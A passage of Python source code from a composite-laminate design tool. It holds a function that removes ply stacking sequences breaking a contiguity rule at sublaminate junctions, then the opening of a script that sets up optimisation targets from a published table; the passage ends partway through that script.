"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunction to ensure external sorting for contiguity\r\n'across adjacent sublaminates'\r\n\r\nCreated on Mon Jan 29 12:00:18 2018\r\n\r\n@author: Noemie Fedon\r\n\"\"\"\r\n\r\nimport numpy as np\r\n\r\ndef external_contig(angle, n_plies_group, constraints, ss_before, angle2 = None):\r\n '''\r\nreturns only the stacking sequences that satisfy constraints concerning\r\ncontiguity at the junction with an adjacent group of plies, but not within the\r\ngroup of plies\r\n\r\nOUTPUTS\r\n\r\n- angle: the selected sublaminate stacking sequences line by\r\nline\r\n- angle2: the selected sublaminate stacking sequences line by\r\nline if a second sublaminate is given as input for angle2\r\n\r\nINPUTS\r\n\r\n- angle: the first sublaminate stacking sequences\r\n- angle:2 matrix storing the second sublaminate stacking sequences\r\n- ss_before is the stacking sequence of the sublaminate adjacent to the first\r\nsublaminate\r\n\r\n '''\r\n if angle.ndim == 1:\r\n angle = angle.reshape((1, angle.size))\r\n\r\n ss_beforeLength = ss_before.size\r\n\r\n # CHECK FOR CORRECT INPUTS SIZE\r\n if n_plies_group > angle.shape[1]:\r\n raise Exception('The input set of angles have fewer elements that what is asked to be checked')\r\n\r\n if angle2 is None:\r\n\r\n # TO ENSURE CONTIGUITY\r\n if constraints.contig:\r\n\r\n # To ensure the contiguity constraint at the junction of ply groups\r\n if ss_beforeLength>=1:\r\n\r\n if constraints.n_contig ==2:\r\n\r\n if n_plies_group>1:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 3:\r\n\r\n if n_plies_group>2:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 4:\r\n\r\n if n_plies_group>3:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1] \\\r\n and angle[ii, 3] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 5:\r\n\r\n if n_plies_group>4:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1] \\\r\n and angle[ii, 3] == ss_before[-1]\\\r\n and angle[ii, 4] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 6:\r\n\r\n if n_plies_group>5:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1] \\\r\n and angle[ii, 3] == ss_before[-1] \\\r\n and angle[ii, 4] == ss_before[-1] \\\r\n and angle[ii, 5] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n else:\r\n raise Exception(\r\n 'constraints.n_contig must be 2, 3, 4 or 5')\r\n\r\n\r\n if ss_beforeLength>=2:\r\n if constraints.n_contig ==2:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 0] == ss_before[-2]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 3:\r\n\r\n if n_plies_group>1:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 4:\r\n\r\n if n_plies_group>2:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n\r\n elif constraints.n_contig == 5:\r\n\r\n if n_plies_group>3:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1] \\\r\n and angle[ii, 3] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 6:\r\n\r\n if n_plies_group>4:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1] \\\r\n and angle[ii, 3] == ss_before[-1] \\\r\n and angle[ii, 4] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n else:\r\n raise Exception(\r\n 'constraints.n_contig must be 2, 3, 4 or 5')\r\n\r\n\r\n if ss_beforeLength>=3:\r\n if constraints.n_contig == 2:\r\n pass\r\n elif constraints.n_contig == 3:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and ss_before[-3] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 4:\r\n\r\n if n_plies_group>1:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and ss_before[-3] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 5:\r\n\r\n if n_plies_group>2:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and ss_before[-3] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 6:\r\n\r\n if n_plies_group>3:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and ss_before[-3] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1] \\\r\n and angle[ii, 3] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n else:\r\n raise Exception(\r\n 'constraints.n_contig must be 2, 3, 4 or 5')\r\n\r\n if ss_beforeLength>=4:\r\n if constraints.n_contig ==2:\r\n pass\r\n\r\n elif constraints.n_contig == 3:\r\n pass\r\n\r\n elif constraints.n_contig == 4:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and ss_before[-4] == ss_before[-1] \\\r\n and ss_before[-3] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 5:\r\n\r\n if n_plies_group>1:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and ss_before[-4] == ss_before[-1] \\\r\n and ss_before[-3] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 6:\r\n\r\n if n_plies_group>2:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and ss_before[-4] == ss_before[-1] \\\r\n and ss_before[-3] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n else:\r\n raise Exception(\r\n 'constraints.n_contig must be 2, 3, 4 or 5')\r\n\r\n if ss_beforeLength>=5:\r\n if constraints.n_contig ==2:\r\n pass\r\n\r\n elif constraints.n_contig == 3:\r\n pass\r\n\r\n elif constraints.n_contig == 4:\r\n pass\r\n\r\n elif constraints.n_contig == 5:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and ss_before[-4] == ss_before[-1] \\\r\n and ss_before[-3] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1] \\\r\n and angle[ii, 0] == ss_before[-5]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 6:\r\n\r\n if n_plies_group>1:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and ss_before[-4] == ss_before[-1] \\\r\n and ss_before[-3] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1] \\\r\n and angle[ii, 0] == ss_before[-5] \\\r\n and angle[ii, 1] == ss_before[-5]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n else:\r\n raise Exception(\r\n 'constraints.n_contig must be 2, 3, 4 or 5')\r\n\r\n if ss_beforeLength>=6:\r\n if constraints.n_contig == 2:\r\n pass\r\n\r\n elif constraints.n_contig == 3:\r\n pass\r\n\r\n elif constraints.n_contig == 4:\r\n pass\r\n\r\n elif constraints.n_contig == 5:\r\n pass\r\n\r\n elif constraints.n_contig == 6:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and ss_before[-4] == ss_before[-1] \\\r\n and ss_before[-3] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1] \\\r\n and angle[ii, 0] == ss_before[-5] \\\r\n and ss_before[-6] == ss_before[-5]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n else:\r\n raise Exception(\r\n 'constraints.n_contig must be 2, 3, 4 or 5')\r\n\r\n else:\r\n\r\n # TO ENSURE CONTIGUITY\r\n if constraints.contig:\r\n\r\n # To ensure the contiguity constraint at the junction of ply groups\r\n if ss_beforeLength>=1:\r\n\r\n if constraints.n_contig ==2:\r\n\r\n if n_plies_group>1:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 3:\r\n\r\n if n_plies_group>2:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 4:\r\n\r\n if n_plies_group>3:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1] \\\r\n and angle[ii, 3] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 5:\r\n\r\n if n_plies_group>4:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1] \\\r\n and angle[ii, 3] == ss_before[-1]\\\r\n and angle[ii, 4] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 6:\r\n\r\n if n_plies_group>5:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1] \\\r\n and angle[ii, 3] == ss_before[-1] \\\r\n and angle[ii, 4] == ss_before[-1] \\\r\n and angle[ii, 5] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n else:\r\n raise Exception(\r\n 'constraints.n_contig must be 2, 3, 4 or 5')\r\n\r\n\r\n if ss_beforeLength>=2:\r\n if constraints.n_contig ==2:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 0] == ss_before[-2]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 3:\r\n\r\n if n_plies_group>1:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 4:\r\n\r\n if n_plies_group>2:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n\r\n elif constraints.n_contig == 5:\r\n\r\n if n_plies_group>3:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1] \\\r\n and angle[ii, 3] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 6:\r\n\r\n if n_plies_group>4:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1] \\\r\n and angle[ii, 3] == ss_before[-1] \\\r\n and angle[ii, 4] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n else:\r\n raise Exception(\r\n 'constraints.n_contig must be 2, 3, 4 or 5')\r\n\r\n\r\n if ss_beforeLength>=3:\r\n if constraints.n_contig == 2:\r\n pass\r\n elif constraints.n_contig == 3:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and ss_before[-3] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 4:\r\n\r\n if n_plies_group>1:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and ss_before[-3] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 5:\r\n\r\n if n_plies_group>2:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and ss_before[-3] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 6:\r\n\r\n if n_plies_group>3:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and ss_before[-3] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1] \\\r\n and angle[ii, 3] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n else:\r\n raise Exception(\r\n 'constraints.n_contig must be 2, 3, 4 or 5')\r\n\r\n if ss_beforeLength>=4:\r\n if constraints.n_contig ==2:\r\n pass\r\n\r\n elif constraints.n_contig == 3:\r\n pass\r\n\r\n elif constraints.n_contig == 4:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and ss_before[-4] == ss_before[-1] \\\r\n and ss_before[-3] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 5:\r\n\r\n if n_plies_group>1:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and ss_before[-4] == ss_before[-1] \\\r\n and ss_before[-3] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 6:\r\n\r\n if n_plies_group>2:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and ss_before[-4] == ss_before[-1] \\\r\n and ss_before[-3] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1] \\\r\n and angle[ii, 1] == ss_before[-1] \\\r\n and angle[ii, 2] == ss_before[-1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n else:\r\n raise Exception(\r\n 'constraints.n_contig must be 2, 3, 4 or 5')\r\n\r\n if ss_beforeLength>=5:\r\n if constraints.n_contig ==2:\r\n pass\r\n\r\n elif constraints.n_contig == 3:\r\n pass\r\n\r\n elif constraints.n_contig == 4:\r\n pass\r\n\r\n elif constraints.n_contig == 5:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and ss_before[-4] == ss_before[-1] \\\r\n and ss_before[-3] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1] \\\r\n and angle[ii, 0] == ss_before[-5]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n elif constraints.n_contig == 6:\r\n\r\n if n_plies_group>1:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and ss_before[-4] == ss_before[-1] \\\r\n and ss_before[-3] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1] \\\r\n and angle[ii, 0] == ss_before[-5] \\\r\n and angle[ii, 1] == ss_before[-5]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n else:\r\n raise Exception(\r\n 'constraints.n_contig must be 2, 3, 4 or 5')\r\n\r\n if ss_beforeLength>=6:\r\n if constraints.n_contig == 2:\r\n pass\r\n\r\n elif constraints.n_contig == 3:\r\n pass\r\n\r\n elif constraints.n_contig == 4:\r\n pass\r\n\r\n elif constraints.n_contig == 5:\r\n pass\r\n\r\n elif constraints.n_contig == 6:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n if angle[ii, 0] == ss_before[-1] \\\r\n and ss_before[-4] == ss_before[-1] \\\r\n and ss_before[-3] == ss_before[-1] \\\r\n and ss_before[-2] == ss_before[-1] \\\r\n and angle[ii, 0] == ss_before[-5] \\\r\n and ss_before[-6] == ss_before[-5]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n continue\r\n\r\n else:\r\n raise Exception(\r\n 'constraints.n_contig must be 2, 3, 4 or 5')\r\n\r\n return angle, angle2\r\n\r\n\r\nif __name__ == \"__main__\":\r\n 'Test'\r\n\r\n import sys\r\n sys.path.append(r'C:\\BELLA')\r\n from src.LAYLA_V02.constraints import Constraints\r\n from src.divers.pretty_print import print_ss, print_list_ss\r\n\r\n constraints = Constraints()\r\n constraints.contig = True\r\n constraints.n_contig = 2\r\n\r\n print('*** Test for the function external_contig ***\\n')\r\n print('Input stacking sequences:\\n')\r\n ss = np.array([[-45, -45, 0, 45, 90], [0, 45, 45, 45, 45],[0, 0, 0, 45, 45]])\r\n print_list_ss(ss)\r\n print('Stacking sequence of adajacent sublaminate:\\n')\r\n ss_before = np.array([-45])\r\n print_ss(ss_before)\r\n n_plies_group = 5\r\n middle_ply = 0\r\n test, _ = external_contig(ss, n_plies_group, constraints, ss_before, ss)\r\n if test.shape[0]:\r\n print('Stacking sequences satisfying the rule:\\n')\r\n print_list_ss(test)\r\n else:\r\n print('No stacking sequence satisfy the rule\\n')"
},
{
"alpha_fraction": 0.45272988080978394,
"alphanum_fraction": 0.5437979102134705,
"avg_line_length": 37.06080627441406,
"blob_id": "70985a71077b7e18a5368ad23c756092c31baa9c",
"content_id": "78333702d165a958f32df86ab7f0a5538a88f884",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 41760,
"license_type": "permissive",
"max_line_length": 145,
"num_lines": 1069,
"path": "/src/LAYLA_V02/scripts/run_LAYLA_table_4_liu_kennedy.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nLAYLA retrieves the LAminate LAY-ups from lamination parameters corresponding\r\nto the Table 4 in the publication:\r\n\r\n \"Two-level layup optimization of composite laminate using lamination\r\n parameters \" Liu X Featherston C Kennedy D\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\nimport numpy.matlib\r\nimport pandas as pd\r\nimport time\r\nimport sys\r\nsys.path.append(r'C:\\BELLA_and_LAYLA')\r\nfrom src.LAYLA_V02.targets import Targets\r\nfrom src.LAYLA_V02.parameters import Parameters\r\nfrom src.LAYLA_V02.constraints import Constraints\r\nfrom src.LAYLA_V02.optimiser import LAYLA_optimiser\r\nfrom src.LAYLA_V02.objectives import objectives\r\n\r\nfrom src.BELLA.materials import Material\r\n\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.CLA.ABD import A_from_lampam, B_from_lampam, D_from_lampam\r\n\r\nfrom src.guidelines.one_stack import check_lay_up_rules\r\n\r\nfrom src.divers.excel import autofit_column_widths\r\nfrom src.divers.excel import delete_file, append_df_to_excel\r\nfrom src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\n\r\nfrom src.LAYLA_V02.save_set_up import save_constraints_LAYLA\r\nfrom src.LAYLA_V02.save_set_up import save_parameters_LAYLA_V02\r\nfrom src.LAYLA_V02.save_set_up import save_materials\r\n\r\n\r\nresult_filename = 'LAYLA_vs_global_layerwise_optimisation.xlsx'\r\ndelete_file(result_filename)\r\n\r\n#==============================================================================\r\n# design and manufacturing constraints\r\n#==============================================================================\r\nset_of_angles = np.array([-45, 0, 45, 90], dtype=int)\r\n#set_of_angles = np.array([-45, 0, 45, 90, +30, -30, +60, -60], dtype=int)\r\n\r\n# rule 1: one outer ply at + or -45 deg at laminate surfaces\r\n# rule 2: [+45, -45] or [-45, +45] plies at laminate surfaces\r\n# rule 3: [+45, -45], [+45, +45], [-45, -45] or [-45, +45] plies at laminate\r\ndam_tol_rule = 3\r\n\r\ncombine_45_135 = False\r\npercent_0 = 10 # percentage used in the 10% rule for 0 deg plies\r\npercent_45 = 10 # percentage used in the 10% rule for +45 deg plies\r\npercent_90 = 10 # percentage used in the 10% rule for 90 deg plies\r\npercent_135 = 10 # percentage used in the 10% rule for -45 deg plies\r\npercent_45_135 = 10 # percentage used in the 10% rule for +-45 deg plies\r\n\r\ndelta_angle = 45\r\n\r\nn_contig = 4\r\n\r\n#==============================================================================\r\n# Material properties\r\n#==============================================================================\r\n# Elastic modulus in the fibre direction (Pa)\r\nE11 = 128e9\r\n# Elastic modulus in the transverse direction (Pa)\r\nE22 = 10.3e9\r\n# Poisson's ratio relating transverse deformation and axial loading (-)\r\nnu12 = 0.3\r\n# In-plane shear modulus (Pa)\r\nG12 = 6e9\r\nmat_prop = Material(E11 = E11, E22 = E22, G12 = G12, nu12 = nu12)\r\n\r\n#==============================================================================\r\n# Optimiser Parameters\r\n#==============================================================================\r\nn_outer_step = 5\r\n\r\n# branching limit for global pruning during ply orientation optimisation\r\nglobal_node_limit = 10\r\n# branching limit for local pruning during ply orientation optimisation\r\nlocal_node_limit = 10\r\n# branching limit for global pruning at the penultimate level during ply\r\n# orientation optimisation\r\nglobal_node_limit_p = 10\r\n# branching limit for local pruning at the last level during ply\r\n# orientation optimisation\r\nlocal_node_limit_final = 1\r\n\r\n### Techniques to enforce the constraints\r\n# repair to improve the convergence towards the in-plane lamination parameter\r\n# targets\r\nrepair_membrane_switch = True\r\n# repair to improve the convergence towards the out-of-plane lamination\r\n# parameter targets\r\nrepair_flexural_switch = True\r\n\r\n# penalty for the 10% rule based on ply count restrictions\r\npenalty_10_pc_switch = False\r\n# penalty for the 10% rule based on lamination parameter restrictions\r\npenalty_10_lampam_switch = False\r\n# penalty for in-plane orthotropy, based on lamination parameters\r\npenalty_ipo_switch = False\r\n# penalty for balance, based on ply counts\r\npenalty_bal_switch = False\r\n# balanced laminate scheme\r\nbalanced_scheme = False\r\n\r\n# Coefficient for the 10% rule penalty\r\ncoeff_10 = 1\r\n# Coefficients for the in-plane orthotropy penalty or the balance penalty\r\ncoeff_bal_ipo = 1\r\n# Coefficient for the out-of-plane orthotropy penalty\r\ncoeff_oopo = 1\r\n\r\n# percentage of laminate thickness for plies that can be modified during\r\n# the refinement of membrane properties\r\np_A = 80\r\n# number of plies in the last permutation during repair for disorientation\r\n# and/or contiguity\r\nn_D1 = 6\r\n# number of ply shifts tested at each step of the re-designing process during\r\n# refinement of flexural properties\r\nn_D2 = 10\r\n# number of times the algorithms 1 and 2 are repeated during the flexural\r\n# property refinement\r\nn_D3 = 2\r\n\r\n### Other parameters\r\noptimisation_type = 'AD'\r\n\r\n# Lamination parameters to be considered in the multi-objective functions\r\nlampam_to_be_optimised = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])\r\n\r\n# Lamination parameters sensitivities from the first-lebel optimiser\r\nfirst_level_sensitivities = np.ones((12,), float)\r\n\r\n# Minimum group size allowed for the smallest groups\r\ngroup_size_min = 5\r\n# Desired number of plies for the groups at each outer loop\r\ngroup_size_max = np.array([1000, 12, 12, 12, 12])\r\n\r\n#==============================================================================\r\ntimesK = [3600, 7.10, 7.40, 0.95, 1.40, 5.87, 5.30, 0.64, 0.91,\r\n 3600, 5.95, 6.34, 0.90, 1.59, 9.06, 6.55, 1.01, 1.37\r\n ]\r\n\r\ncomments = ['Normal',\r\n 'Symmetric',\r\n 'Sym + contiguity',\r\n 'Sym + disorientation',\r\n 'Sym + disorientation',\r\n 'Sym + 10%',\r\n 'Sym + 10% + contiguity + damtol',\r\n 'Sym + 10% + contiguity + damtol + disorientation',\r\n 'Sym + 10% + contiguity + damtol + disorientation',\r\n 'Balanced',\r\n 'Sym + bal',\r\n 'Sym + bal + contiguity',\r\n 'Sym + bal + disorientation',\r\n 'Sym + bal + disorientation',\r\n 'Sym + bal + 10%',\r\n 'Sym + bal + 10% + contiguity + damtol',\r\n 'Sym + bal + 10% + contiguity + damtol + disorientation',\r\n 'Sym + bal + 10% + contiguity + damtol + disorientation',\r\n ]\r\n\r\nply_counts = [28, 28, 28, 28, 29, 28, 28, 28, 29,\r\n 28, 28, 28, 28, 29, 28, 28, 28, 29\r\n ]\r\n\r\nlampam_targets = [\r\n np.array([-0.168, -0.0854, 0.0097, 0,\r\n -0.0072, -0.0072, -0.0072, 0,\r\n 0.0746, -0.7087, -0.0261, 0]),\r\n np.array([-0.1913, -0.0612, -0.0344, 0,\r\n 0, 0, 0, 0,\r\n 0.0259, -0.7922, -0.0303, 0]),\r\n np.array([-0.0888, -0.2551, 0.0856, 0,\r\n 0, 0, 0, 0,\r\n 0.0628, -0.8113, -0.0123, 0]),\r\n np.array([-0.1542, -0.0802, 0, 0,\r\n -0.029, -0.029, 